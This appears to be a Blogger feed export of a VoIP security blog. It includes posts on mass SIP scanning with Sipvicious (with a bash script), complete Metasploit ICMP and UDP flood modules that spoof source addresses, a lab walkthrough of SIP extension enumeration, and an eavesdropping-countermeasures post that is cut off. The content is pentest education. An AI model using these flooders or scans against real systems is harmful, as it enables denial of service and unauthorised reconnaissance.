tag:blogger.com,1999:blog-77438191581941845492012-02-26T15:36:16.392+01:00Ni ceros ni unos ...... mind overflow ...Jesús Pérezhttp://www.blogger.com/profile/09565740223441207640noreply@blogger.comBlogger191100tag:blogger.com,1999:blog-7743819158194184549.post-80272581488999377282012-02-11T18:40:00.000+01:002012-02-14T15:54:15.317+01:00Scanning the world with Sipvicious<br />Hi, I´m scanning a large number of ranges with <a href="http://code.google.com/p/sipvicious/" target="_blank">Sipvicious</a> ("<a href="http://code.google.com/p/sipvicious/wiki/SvmapUsage">svmap.py</a>") and I would like to share some tips which helped me during the process:<br /><br />- The use of sessions (-s) and reports ("svreport.py") is necessary to prevent mixing of obtained data.<br /><br />- It´s a good idea to scan not only port 5060, you should add successive ports because some sysadmins configure their SIP services to run there (-p5060-5065).<br /><br />- There is a <a href="http://www.voip-info.org/wiki/view/NAT+and+VOIP">well known "problem"</a> about SIP and NAT, if you have installed an Asterisk you have heard about it sure :(, so we need to specify our external IP address to Sipvicious with (-x) parameter. Moreover port 5060(Sipvicious outcoming port) has to be forwarded to host which is scanning, in case that you were scanning with more than one instance at the same time successive ports should be forwarded too. I usually put the host int the DMZ trying to avoid these problems.<br /><br />- "svreport.py" tries to make a DNS lookup with the discovered IPs but it takes too much time in case of too many hosts so we can disable it (-n).<br /><br />- Normally, some hosts aren't recognized and marked as "unknown", you could run tcpdump in order to capture the responses and avoid the loss of information.<br /><br />- I wrote that dirty bash script which reflects exposed ideas:<br /><br />Code:<br />-----------------------------------------<br /><code><span style="font-size: x-small;">#!/bin/bash<br /># It scans ranges from a text file with sipvicious<br /># Use: ./scanRange.sh<br /><br />SVMAP="/home/baguira/Installed/sipvicious/svmap.py"<br />SVREPORT="/home/baguira/Installed/sipvicious/svreport.py"<br /><br /># just in case "unknown" devices<br />sudo tcpdump udp and dst host 192.168.9.5 -s 65535 -w capture1.pcap & <br /># scan all ranges<br />for RANGE in $(cat ranges1.txt)<br />do<br /> RNAME=$(echo $RANGE | awk -F / '{print $1}')<br /> EXTIP=$(curl -s icanhazip.com)<br /> $SVMAP -p5060-5065 -s $RNAME -x $EXTIP --randomize $RANGE<br /> NEXTIP=$(curl -s icanhazip.com)<br /> # external ip change check<br /> if [ "$EXTIP" != "$NEXTIP" ]<br /> then<br /> # wait until router finish reboot<br /> sleep 180<br /> $SVREPORT delete -s $RNAME<br /> EXTIP=$(curl -s icanhazip.com)<br /> $SVMAP -p5060-5065 -s $RNAME -x $EXTIP --randomize $RANGE<br /> fi <br /> $SVREPORT export -s $RNAME -f txt -o $RNAME.txt -n<br />done<br />sudo killall tcpdump > /dev/null</span></code><br />-----------------------------------------<br /><br />To sum up I would like to thank <a href="http://twitter.com/sandrogauci">Sandro Gauci</a> (Sipvicious developer) for the software and for being really nice whith my doubts. Thank you man! ;)<br /><br /><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7743819158194184549-8027258148899937728?l=nicerosniunos.blogspot.com' alt='' /></div>Jesús Pérezhttp://www.blogger.com/profile/09565740223441207640noreply@blogger.com0tag:blogger.com,1999:blog-7743819158194184549.post-35815490081652819312012-01-15T20:13:00.001+01:002012-02-14T15:54:44.954+01:00Another simple Metasploit module: ICMP Flooder<br />Hi again!, I said I was going to develope VoIP related Metasploit modules but I was reading <a href="http://www.planb-security.net/packetfu/doc/classes/PacketFu/ICMPPacket.html">PacketFu documentation</a> and I found that wrinting an <a href="http://en.wikipedia.org/wiki/Denial-of-service_attack#ICMP_flood">ICMP flooder</a> couldn´t be too complicated at this point. So I share this code too, I decided to include SHOST and SIZE options too trying to get a more flexible module able to make different flavors of this attack as <a href="http://en.wikipedia.org/wiki/Ping_flood">Ping flood</a>, <a href="http://en.wikipedia.org/wiki/Smurf_attack">Smurf</a> or <a href="http://en.wikipedia.org/wiki/Ping_of_death">Ping of death</a>. Next pictures show the module in the same way of last post.<br /><br />Code:<br /><br />-------------------------------------------------------------------------<br /><code><span style="font-size: x-small;">require 'msf/core'<br /><br />class Metasploit3 < Msf::Auxiliary<br /></span></code><br /><code><span style="font-size: x-small;">include Msf::Auxiliary::Dos</span></code><br /><div><code><span style="font-size: x-small;">include Msf::Exploit::Capture</span></code></div><code><span style="font-size: x-small;"><br /> def initialize<br /> super(<br /> 'Name' => 'ICMP Flooder',<br /> 'Description' => 'A simple ICMP flooder',<br /> 'Author' => 'Jesus Perez',<br /> 'License' => MSF_LICENSE,<br /> 'Version' => '$Revision: 0 $'<br /> )<br /><br /> register_options(<br /> [<br /> OptAddress.new('SHOST', [false, 'The spoofable source address (else randomizes)']),<br /> OptInt.new('NUM', [false, 'Number of ping packets to send (else unlimited)']),<br /> OptInt.new('SIZE', [false, 'Size of ICMP packets to send (else 256 bytes)'])<br /> ], self.class)<br /> deregister_options('FILTER','PCAPFILE','SNAPLEN')<br /> end<br /><br /> def srchost<br /> datastore['SHOST'] || [rand(0x100000000)].pack('N').unpack('C*').join('.')<br /> end<br /><br /> def size<br /> datastore['SIZE'].to_i.zero? ? 256 : datastore['SIZE'].to_i<br /> end<br /><br /> def run<br /> open_pcap<br /><br /> sent = 0<br /> num = datastore['NUM']<br /><br /> print_status("ICMP flooding #{rhost}...")<br /><br /> p = PacketFu::ICMPPacket.new<br /> p.icmp_type = 8<br /> p.icmp_code = 0<br /> p.ip_daddr = rhost<br /><br /> while (num <= 0) or (sent < num)<br /> p.ip_saddr = srchost<br /> p.payload = rand(36**size).to_s(36)<br /> p.recalc<br /> capture_sendto(p,rhost)<br /> sent += 1<br /> end<br /><br /> close_pcap<br /> end<br />end</span></code><br /><code></code>-------------------------------------------------------------------------<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-vk7ZGp0Du3k/TxMj_GrNoSI/AAAAAAAAAXg/OQXS5fLeSas/s1600/figure1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="188" src="http://2.bp.blogspot.com/-vk7ZGp0Du3k/TxMj_GrNoSI/AAAAAAAAAXg/OQXS5fLeSas/s320/figure1.png" width="320" /></a></div><br /><div style="text-align: center;"><span style="font-size: x-small;">Figure: Usage information</span></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-Xf7jtGIn8Ds/TxMj_1OQcZI/AAAAAAAAAXo/v8GNN0KKzwg/s1600/figure2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="52" src="http://1.bp.blogspot.com/-Xf7jtGIn8Ds/TxMj_1OQcZI/AAAAAAAAAXo/v8GNN0KKzwg/s320/figure2.png" width="320" /></a></div><div style="text-align: -webkit-auto;"><br /></div><div style="text-align: center;"><span style="font-size: x-small;">Figure: Sniffed packets</span></div><div style="text-align: center;"><br /></div><div style="text-align: right;">Jesús Pérez</div><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7743819158194184549-3581549008165281931?l=nicerosniunos.blogspot.com' alt='' /></div>Jesús Pérezhttp://www.blogger.com/profile/09565740223441207640noreply@blogger.com1tag:blogger.com,1999:blog-7743819158194184549.post-31101069163716437682012-01-15T18:42:00.000+01:002012-02-14T15:56:13.830+01:00My first Metasploit module: UDP Flooder<div>There are <a href="http://metasploit.com/modules/framework/search?utf8=%E2%9C%93&osvdb=&bid=&text=sip&cve=&msb=">very few Metasploit modules</a>, neither Auxiliaries nor Exploits, VoIP related so I have in mind to write some of them in my free time. Today I want to share a <a href="http://en.wikipedia.org/wiki/UDP_flood_attack)">UDP flooder</a> Aux. module, which is very simple but perfect for learning, <a href="http://www.hackingvoip.com/tools/udpflood.tar.gz">UDPFlooder</a> is one of the many tools covered in <a href="http://www.hackingvoip.com/">"Hacioking VoIP Exposed"</a> book, considered a reference in this field.<br /><br />Code:<br /><br />-------------------------------------------------------------------------<br /><code><span style="color: #444444; font-size: x-small;">require 'msf/core'<br /><br />class Metasploit3 < Msf::Auxiliary<br /></span></code><br /><code><span style="color: #444444; font-size: x-small;">include Msf::Auxiliary::Dos</span></code><br /><div><code><span style="color: #444444; font-size: x-small;">include Msf::Exploit::Capture</span></code></div><span style="color: #444444; font-size: x-small;"><code><br /> def initialize<br /> super(<br /> 'Name' => 'UDP Flooder',<br /> 'Description' => 'A simple UDP flooder',<br /> 'Author' => 'Jesus Perez',<br /> 'License' => MSF_LICENSE,<br /> 'Version' => '$Revision: 0 $'</code><span style="font-family: monospace;">)</span></span><br /><span style="color: #444444; font-size: x-small;"><br /></span><br /><span style="color: #444444; font-size: x-small;">register_options(</span><br /><code><span style="color: #444444; font-size: x-small;"> [<br /> Opt::RPORT(5060),<br /> OptAddress.new('SHOST', [false, 'The spoofable source address (else randomizes)']),<br /> OptInt.new('SPORT', [false, 'The source port (else randomizes)']),<br /> OptInt.new('NUM', [false, 'Number of UDP packets to send (else unlimited)']),<br /> OptInt.new('SIZE', [false, 'Size of UDP packets to send (else 256 bytes)'])<br /> ], self.class)<br /> deregister_options('FILTER','PCAPFILE','SNAPLEN')<br /> end<br /><br /> def sport<br /> datastore['SPORT'].to_i.zero? ? rand(65535)+1 : datastore['SPORT'].to_i<br /> end<br /><br /> def rport<br /> datastore['RPORT'].to_i<br /> end<br /><br /> def srchost<br /> datastore['SHOST'] || [rand(0x100000000)].pack('N').unpack('C*').join('.')<br /> end<br /> <br /> def size<br /> datastore['SIZE'].to_i.zero? ? 256 : datastore['SIZE'].to_i<br /> end<br /><br /> def run<br /> open_pcap<br /><br /> sent = 0<br /> num = datastore['NUM']<br /><br /> print_status("UDP flooding #{rhost}:#{rport}...")<br /><br /> p = PacketFu::UDPPacket.new</span></code><br /><code><span style="color: #444444; font-size: x-small;">p.ip_daddr = rhost<br /> p.udp_dport = rport<br /> <br /> while (num <= 0) or (sent < num)<br /> p.ip_ttl = rand(128)+128<br /> p.ip_saddr = srchost<br /> p.udp_sport = sport<br /> p.payload = rand(36**size).to_s(36)<br /> p.recalc<br /> capture_sendto(p,rhost)<br /> sent += 1<br /> end<br /><br /> close_pcap<br /> end<br />end</span></code><br />--------------------------------------------------------------------------<br /><br />Most of the code is taken from Metasploit <a href="l:http://metasploit.com/modules/auxiliary/dos/tcp/synflood">TCP SYN Flooder</a> module but I made some more changes besides adapting it to UDP. The same way TTL is changed in each packet, I prefer to change the source (spoofed) address too because of the same reason (IDS/Firewall evasion). Moreover, in this case something to send is needed so I added the new option SIZE which determines the lenght of this random string. Another different thing you could apprecciate is that option SNAPLEN is unregistered too because of having no sense in this module.<br /><br /><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-EA9DxB-jmyM/TxMO4hxzWNI/AAAAAAAAAXY/sH2BFcapseo/s1600/figure1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="210" src="http://3.bp.blogspot.com/-EA9DxB-jmyM/TxMO4hxzWNI/AAAAAAAAAXY/sH2BFcapseo/s320/figure1.png" width="320" /></a></div><br /><div style="text-align: center;"><span style="font-size: x-small;">Figure: Usage information</span></div><br />Finally, in order to test if module works fine I´m going to sniff the interface and see, with help of Wireshark, what it´s really happening. Next picture shows that everything seems to be working as defined in the description of the attack. :)<br /><br /><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-PyxBYtLMJRM/TxMHw5R8qOI/AAAAAAAAAXQ/Jh9WbSzbFdE/s1600/figure2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="90" src="http://1.bp.blogspot.com/-PyxBYtLMJRM/TxMHw5R8qOI/AAAAAAAAAXQ/Jh9WbSzbFdE/s320/figure2.png" width="320" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/--EF4-7AYXFA/TxLn8haYE7I/AAAAAAAAAXI/u3ysdL1xFYA/s1600/figure3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="120" src="http://3.bp.blogspot.com/--EF4-7AYXFA/TxLn8haYE7I/AAAAAAAAAXI/u3ysdL1xFYA/s320/figure3.png" width="320" /></a></div><br /><div style="text-align: center;"><span style="font-size: x-small;">Figures: Sniffed packets</span></div><br /><div style="text-align: right;">Jesús Pérez</div></div><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7743819158194184549-3110106916371643768?l=nicerosniunos.blogspot.com' alt='' /></div>Jesús Pérezhttp://www.blogger.com/profile/09565740223441207640noreply@blogger.com0tag:blogger.com,1999:blog-7743819158194184549.post-23252981607530707942011-11-22T12:45:00.001+01:002012-02-11T18:20:47.718+01:00Some posts on Flu-Project blog<br />I recently wrote two posts (in Spanish) on <a href="http://www.flu-project.com/">Flu-Project </a>blog about my recent experience in <a href="http://www.sindominio.net/hackmeeting/">Hackmeeting 2011 (MeigHacks)</a> and some of the issues I treated during <a href="http://www.sindominio.net/hackmeeting/index.php?title=2011/Nodos/Herramientas_de_%22bot%C3%B3n_gordo%22_y_hacktivismo">my lecture</a>, including <a href="http://w3af.sourceforge.net/">W3af</a> and <a href="http://sqlmap.sourceforge.net/">SQLMap</a>. These are the links:<br /><br />- <a href="http://www.flu-project.com/de-paso-por-el-hackmeeting-2o11.html">De paso por el Hackmeeting 2011</a><br />- <a href="http://www.flu-project.com/badstore-sqli-y-otras-chicas-del-monton.html">Badstore, SQLi y otras chicas del montón</a><br /><br /><br /><div style="text-align: right;">Jesús Pérez</div><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7743819158194184549-2325298160753070794?l=nicerosniunos.blogspot.com' alt='' /></div>Jesús Pérezhttp://www.blogger.com/profile/09565740223441207640noreply@blogger.com0tag:blogger.com,1999:blog-7743819158194184549.post-43455615497774983802011-09-14T10:51:00.002+02:002012-02-11T18:13:26.228+01:00VoIP Information Gathering: Metasploit<br /><a href="https://www.owasp.org/index.php/Testing:_Information_Gathering">Information gathering</a> is the stage of a penetration test when the attacker tries to collect as much information as possible about the target. This step is normally composed for <a href="http://www.sans.org/reading_room/whitepapers/auditing/footprinting-it-it-why_62">footprinting</a> and <a href="l:http://en.wikipedia.org/wiki/TCP/IP_stack_fingerprinting">fingerprinting</a> but, in the case of VoIP systems, we should add extension enumeration to the list. During this last step attacker will attempt to obtain valid extensions/users of the target system.<br /><br /><br /><b>Footprinting & Fingerprinting</b><br /><br />My favourite tools for these jobs are <a href="http://www.youtube.com/watch?v=VTDvCnYt1_I">FOCA</a> and <a href="http://nmap.org/">Nmap</a>, it´s a bit strange combination but it fits for me :). FOCA automates almost all the “dirty job” and it is the best with public documents metadata, while Nmap flexibility let me confirm manually all these discovered stuff. Moreover, in the case of SIP Protocol, FOCA also is able to obtain more information from target <a href="http://www.voip-info.org/wiki/view/DNS+SRV">DNS SRV records</a>, they work in a similar way during a call that <a href="http://en.wikipedia.org/wiki/MX_record">MX</a> ones for mailing. Next picture taken from the blog of its <a href="http://www.elladodelmal.com/">“father”</a> shows an example of them.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-tQsrCVOTNlc/TnBi-pb7icI/AAAAAAAAAV0/PEuiEt7qVyc/s1600/sip_adobe.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="http://4.bp.blogspot.com/-tQsrCVOTNlc/TnBi-pb7icI/AAAAAAAAAV0/PEuiEt7qVyc/s320/sip_adobe.jpg" width="241" /></a></div><br /><div style="text-align: center;"><span class="Apple-style-span" style="font-size: x-small;">Figure: Adobe SRV records</span></div><div style="text-align: center;"><br /></div><span class="Apple-style-span" style="font-size: x-small;">NOTE: FOCA it is not GPL, it´s only <a href="http://en.wikipedia.org/wiki/Gratis_versus_Libre">free as in free beer</a> but, in my opinion, there is no replacement for the moment.</span><br /><br />There are some <a href="http://www.voipsa.org/Resources/tools.php#VoIP Scanning and Enumeration Tools">other specific tools</a> for VoIP which complement classic ones discussed above. I´m going to focus on <a href="http://www.metasploit.com/download/">Metasploit</a> modules because <a href="http://code.google.com/p/sipvicious/">Sipvicious</a> set of tools, which is the most used for this tasks and works in a very similar way, is a lot of documented over the net. These VoIP specific scans reduce strongly the time in comparison of nmap because they send specific SIP request UDP packets instead of ICMP ones. In <a href="http://blog.sipvicious.org/2007/11/introduction-to-svmap.html">this post</a> we can find a complete explanation of that and <a href="http://www.networkuptime.com/nmap/page3-10.shtml">here</a> is exposed how nmap UDP scan works. You can compare it (<i>nmap -sU -p 5060 -sV TARGET</i>) and check that the speed difference is really huge. One important advantage of Metasploit over Sipvicious is the support of threading which could speed up still more the process.<br /><br />So, at this point, we are ready to start scanning a testing environment formed by an Ubuntu 11.04 laptop hosting two virtual machines, connected in NAT mode:<br /><span class="Apple-tab-span" style="white-space: pre;"> </span>- Backtrack 5 R1 box simulating bad guy.<br /><span class="Apple-tab-span" style="white-space: pre;"> </span>- Debian Squeeze box with a basic installation of Asterisk 1.6.2.9-2 and only <i>101</i> and <i>102</i> extensions allowed.<br /><br />There are not too much Metasploit modules involving VoIP but we already have <i>auxiliaries</i> needed for SIP scanning and extension enumeration as showed in the picture:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-ALqw5atR6lQ/TnBjBnu-M9I/AAAAAAAAAV4/vY6DP2KWcjE/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="293" src="http://1.bp.blogspot.com/-ALqw5atR6lQ/TnBjBnu-M9I/AAAAAAAAAV4/vY6DP2KWcjE/s320/1.png" width="320" /></a></div><br /><div style="text-align: center;"><span class="Apple-style-span" style="font-size: x-small;">Figure: Metasploit SIP related modules</span></div><div style="text-align: center;"><br /></div>Now, I´m going to use <a href="http://www.fastandeasyhacking.com/">Armitage</a> (sorry guys, I like GUIs :P) in order to scan my network using "SIP scan (UDP)" (<a href="http://dev.metasploit.com/redmine/projects/framework/repository/entry/modules/auxiliary/scanner/sip/options.rb">auxiliary/scanner/sip/options</a>) module. It supports only OPTIONS scanning but it is enough for being the most realiable type. In fact, INVITE scan could be noisy and produce a "ring” at the other end. If you are interested in all these subjects and how they work more in depth I recommend you (as always) <a href="http://www.hackingvoip.com/">“VoIP Haking Exposed”</a> book.<br /><br />You only have to specify the target for configure the module, next images show the steps and the correct result.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/--3jHqB8WHdQ/TnBjCHw0ZCI/AAAAAAAAAV8/NyLXHyVvOQQ/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="293" src="http://4.bp.blogspot.com/--3jHqB8WHdQ/TnBjCHw0ZCI/AAAAAAAAAV8/NyLXHyVvOQQ/s320/2.png" width="320" /></a></div><br /><div style="text-align: center;"><span class="Apple-style-span" style="font-size: x-small;">Figure: Module configuration</span></div><div style="text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-SfIfgIwfQms/TnBjDP2UFmI/AAAAAAAAAWA/Zg_2lleoQY4/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="293" src="http://2.bp.blogspot.com/-SfIfgIwfQms/TnBjDP2UFmI/AAAAAAAAAWA/Zg_2lleoQY4/s320/3.png" width="320" /></a></div><br /><div style="text-align: center;"><span class="Apple-style-span" style="font-size: x-small;">Figure: Scan result</span></div><div style="text-align: center;"><br /></div><br /><b>Extension enumeration</b><br /><br />Instead of explaining how this attack works in a theorethical way (diagrams and all this stuff) I´m going to refer you to the book and show a situation which helps to understand because user/extension enumeration is possible. Firstly I will try to connect my Ekiga softphone to Asterisk server with a non existent user:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-VYUwauseGKA/TnBjDWhl-CI/AAAAAAAAAWE/2IS-ASmYR2w/s1600/4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="262" src="http://4.bp.blogspot.com/-VYUwauseGKA/TnBjDWhl-CI/AAAAAAAAAWE/2IS-ASmYR2w/s320/4.png" width="320" /></a></div><br /><div style="text-align: center;"><span class="Apple-style-span" style="font-size: x-small;">Figure: Bad user account configuration</span></div><div style="text-align: center;"><span class="Apple-style-span" style="font-size: x-small;"><br /></span></div><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-dRGHx7-oeBY/TnBjD3vq6SI/AAAAAAAAAWI/3FCYSNAc7qE/s1600/5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="136" src="http://3.bp.blogspot.com/-dRGHx7-oeBY/TnBjD3vq6SI/AAAAAAAAAWI/3FCYSNAc7qE/s320/5.png" width="320" /></a></div><div style="text-align: center;"><span class="Apple-style-span" style="font-size: x-small;"><br /></span></div><div style="text-align: center;"><span class="Apple-style-span" style="font-size: x-small;">Figure: Bad login result</span></div><br />Ok, Asterisk didn´t allow the connection, now we are going to try with an existent user and bad password:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-pEFZqX7kDoY/TnBjEWPigpI/AAAAAAAAAWM/K2MLjDDcQzw/s1600/6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="262" src="http://1.bp.blogspot.com/-pEFZqX7kDoY/TnBjEWPigpI/AAAAAAAAAWM/K2MLjDDcQzw/s320/6.png" width="320" /></a></div><br /><div style="text-align: center;"><span class="Apple-style-span" style="font-size: x-small;">Figure: Correct user and bad password configuration</span></div><div style="text-align: center;"><span class="Apple-style-span" style="font-size: x-small;"><br /></span></div><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-MMq5X-6DjCI/TnBjEsNyEHI/AAAAAAAAAWQ/3EYduOK3CLo/s1600/7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="136" src="http://4.bp.blogspot.com/-MMq5X-6DjCI/TnBjEsNyEHI/AAAAAAAAAWQ/3EYduOK3CLo/s320/7.png" width="320" /></a></div><div style="text-align: center;"><span class="Apple-style-span" style="font-size: x-small;"><br /></span></div><div style="text-align: center;"><span class="Apple-style-span" style="font-size: x-small;">Figure: “Not bad” login result</span></div><br />The response is different in both cases so, as you can imagine at this point, we could easily identify different extensions. In order to automate this attack we can use “SIP Username Enumerator (UDP)” module (<a href="http://dev.metasploit.com/redmine/projects/framework/repository/entry/modules/auxiliary/scanner/sip/enumerator.rb">scanner/sip/enumerator</a>) which supports REGISTER and OPTIONS scan (<i>METHOD</i> module parameter). Really it is a <a href="http://en.wikipedia.org/wiki/Brute-force_attack">Brute-force attack</a> trying specified extensions, so it is very important to specify <i><span id="goog_933815410"></span><a href="http://www.metasploit.com/modules/auxiliary/scanner/sip/enumerator">PADLEN</a><span id="goog_933815411"></span> </i>argument, if not, you could obtain a very long list of non-existent extensions. In my case I choose <i>PADLEN</i> equal to 3 because extensions are <i>101</i> and <i>102</i>, I also modifed <i>MAXENT</i> to fit with it.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-GWw74dqYbKI/TnBjFGSI7sI/AAAAAAAAAWU/S0r4Tiu9gDA/s1600/8.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="293" src="http://2.bp.blogspot.com/-GWw74dqYbKI/TnBjFGSI7sI/AAAAAAAAAWU/S0r4Tiu9gDA/s320/8.png" width="320" /></a></div><br /><div style="text-align: center;"><span class="Apple-style-span" style="font-size: x-small;">Figure: Enumerator module configuration</span></div><div style="text-align: center;"><span class="Apple-style-span" style="font-size: x-small;"><br /></span></div><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-TiA_lwGH_7M/TnBjFmCi0AI/AAAAAAAAAWY/VvOd4mPE5NU/s1600/9.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="293" src="http://3.bp.blogspot.com/-TiA_lwGH_7M/TnBjFmCi0AI/AAAAAAAAAWY/VvOd4mPE5NU/s320/9.png" width="320" /></a></div><div style="text-align: center;"><span class="Apple-style-span" style="font-size: x-small;"><br /></span></div><div style="text-align: center;"><span class="Apple-style-span" style="font-size: x-small;">Figure: REGISTER extension enumeration result</span></div><div style="text-align: center;"><span class="Apple-style-span" style="font-size: x-small;"><br /></span></div><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-BND0-m_uIVs/TnBjGYYJzhI/AAAAAAAAAWc/tV1jV0kkl28/s1600/10.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="293" src="http://2.bp.blogspot.com/-BND0-m_uIVs/TnBjGYYJzhI/AAAAAAAAAWc/tV1jV0kkl28/s320/10.png" width="320" /></a></div><div style="text-align: center;"><span class="Apple-style-span" style="font-size: x-small;"><br /></span></div><div style="text-align: center;"><span class="Apple-style-span" style="font-size: x-small;">Figure: OPTIONS extension enumeration result</span></div><br />As you can see I got different results, on one side OPTIONS scan identified extensions <i>500</i> (Asterisk demo) and <i>600</i> (echo demo) and REGISTER scan got real extensions on the other. So it would be necessary to use both types during a pentest process.<br /><br />At this moment Metasploit does not support Asterisk Exchange protocol (this is also part of VoIP protocols as SIP) scan. We have <a href="http://sourceforge.net/projects/enumiax/">enumIAX</a> and <a href="http://code.google.com/p/iaxscan/">iaxscan</a> classic tools, but we are only focus in SIP protocol at this time.<br /><br />Information gathering coutermeasurements is a very interesting subject but I think it is enough for today, typical solutions are <a href="http://ofps.oreilly.com/titles/9780596517342/asterisk-Security.html">Fail2ban combined with Iptables</a> and <a href="http://www.opensips.org/html/docs/modules/1.6.x/pike.html">other specific tools</a> for each type of VoIP system.<br /><br /><div style="text-align: right;">Jesús Pérez</div><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7743819158194184549-4345561549777498380?l=nicerosniunos.blogspot.com' alt='' /></div>Jesús Pérezhttp://www.blogger.com/profile/09565740223441207640noreply@blogger.com0tag:blogger.com,1999:blog-7743819158194184549.post-87830676656738701972011-08-26T12:17:00.002+02:002012-02-15T10:36:46.466+01:00VoIP Eavesdropping: Counter MeasurementsAs we seen in <a href="http://nicerosniunos.blogspot.com/2011/08/voip-eavesdropping-ucsniff-ii.html">two last posts</a> <a href="http://en.wikipedia.org/wiki/Session_Initiation_Protocol">SIP</a>(Sesion Initiation Protocol) is a protocol easily sniffeable because of being transmitted unencrypted over the net. There are some solutions which solve this, but they are not definitive. Next picture show a very basic diagram of one VoIP infrastructure which I will use along this post, at this point we should understand <span id="goog_851462026"></span>SIP is used for creating, modifying and terminating sessions and this sessions are formed for one or several <a href="http://en.wikipedia.org/wiki/Streaming_media">media streams</a> and they occurs between clients, leaving <a href="http://www.webopedia.com/TERM/S/SIP_proxy.html">SIP Proxy</a> aside.<br /><span class="Apple-style-span" style="font-family: inherit;"><br /></span><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-lDEMnnVqSTE/TldsBoKmAhI/AAAAAAAAAVU/Jz-fCujwDzs/s1600/0.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="146" src="http://2.bp.blogspot.com/-lDEMnnVqSTE/TldsBoKmAhI/AAAAAAAAAVU/Jz-fCujwDzs/s320/0.png" width="320" /></a></div><span class="Apple-style-span" style="font-family: inherit;"><br /></span><br /><div style="text-align: center;"><span class="Apple-style-span" style="font-family: inherit; font-size: x-small;">Figure: Basic VoIP network infrastructure</span></div><div style="text-align: center;"><span class="Apple-style-span" style="font-family: inherit;"><br /></span></div><span class="Apple-style-span" style="font-family: inherit;">Mainly we have two options in order to avoid Eavesdropping attacks: <b>encryption</b> or <b>network separation</b>.</span><br /><span class="Apple-style-span" style="font-family: inherit;"><br /></span><br /><span class="Apple-style-span" style="font-family: inherit;"><br /></span><br /><span class="Apple-style-span" style="font-family: inherit;"><b>Network separation</b></span><br /><span class="Apple-style-span" style="font-family: inherit;"><br /></span><br /><span class="Apple-style-span" style="font-family: inherit;">It´s too difficult to own necessary resources to separate physically VoIP network of organization data network. The common solution is to use managed switches and setup different <a href="http://en.wikipedia.org/wiki/Virtual_LAN">VLANs</a></span> (Virtual Private Networks).<br /><span class="Apple-style-span" style="font-family: inherit;"><br /></span><br /><span class="Apple-style-span" style="font-family: inherit;">But this is only applicable inside your LAN and there are a lot of techniques for evading this kind of switches control which allow the attacker hop between different VLANs, we can find them with a simple search on Google:</span><br /><span class="Apple-style-span" style="font-family: inherit;"><a href="http://www.google.es/search?sourceid=chrome&ie=UTF-8&q=vlan+hop">http://www.google.es/search?sourceid=chrome&ie=UTF-8&q=vlan+hop</a></span><br /><span class="Apple-style-span" style="font-family: inherit;">In fact, software used in previous posts supports it for some Cisco routers as showed in the picture:</span><br /><span class="Apple-style-span" style="font-family: inherit;"><br /></span><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-TG2m2yW66ys/TldsDle8TZI/AAAAAAAAAVY/0KlXoSjUboE/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="265" src="http://2.bp.blogspot.com/-TG2m2yW66ys/TldsDle8TZI/AAAAAAAAAVY/0KlXoSjUboE/s320/1.png" width="320" /></a></div><div style="text-align: center;"><span class="Apple-style-span" style="font-family: inherit; font-size: x-small;"><br /></span><br /><span class="Apple-style-span" style="font-family: inherit; font-size: x-small;">Figure: UCSniff VLAN hop</span></div><div style="text-align: center;"><span class="Apple-style-span" style="font-family: inherit;"><br /></span></div><span class="Apple-style-span" style="font-family: inherit;"><br /></span><br /><span class="Apple-style-span" style="font-family: inherit;"><b>Encryption</b></span><br /><span class="Apple-style-span" style="font-family: inherit;"><br 